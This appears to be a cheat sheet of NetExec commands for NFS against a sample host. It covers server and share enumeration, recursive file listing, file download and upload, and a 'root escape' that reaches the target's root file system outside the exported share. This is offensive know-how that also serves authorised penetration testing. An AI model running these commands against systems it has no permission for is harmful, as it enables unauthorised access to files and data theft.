###Enumerate NFS Servers nxc nfs 10.1.1.1 #Detect remote NFS server, enumerate available versions and check for the root escape ###Enumerate NFS Shares nxc nfs 10.1.1.1 --shares #Enumerate exported NFS shares. Output shows target UID, Permissions, Storage Usage, Access List ###List Files nxc nfs 10.1.1.1 --share '/var/nfs/general' --ls '/' #List files on the target system. Choose the target share with the --share flag ###Enumerate all Files on NFS Shares nxc nfs 10.1.1.1 --enum-shares #Enumerate all files and folders recursively with --enum-shares with a given recursion depth (default is 3 layers). nxc nfs 10.1.1.1 --enum-shares 5 #Enumerate all files and folders recursively with --enum-shares with a given recursion depth of 5 ##Download and Upload Files nxc nfs 10.1.1.1 --share /home/user/Desktop/NFSShare/ --get-file test.txt test.txt #Download test.txt file on remote target nxc nfs 10.1.1.1 --share /home/user/Desktop/NFSShare/ --put-file test.txt test.txt #Upload test.txt file to remote target ###Escape to Root File System nxc nfs 10.1.1.1 --ls '/' #NetExec will automatically try to use the root escape if no share was specified in the command.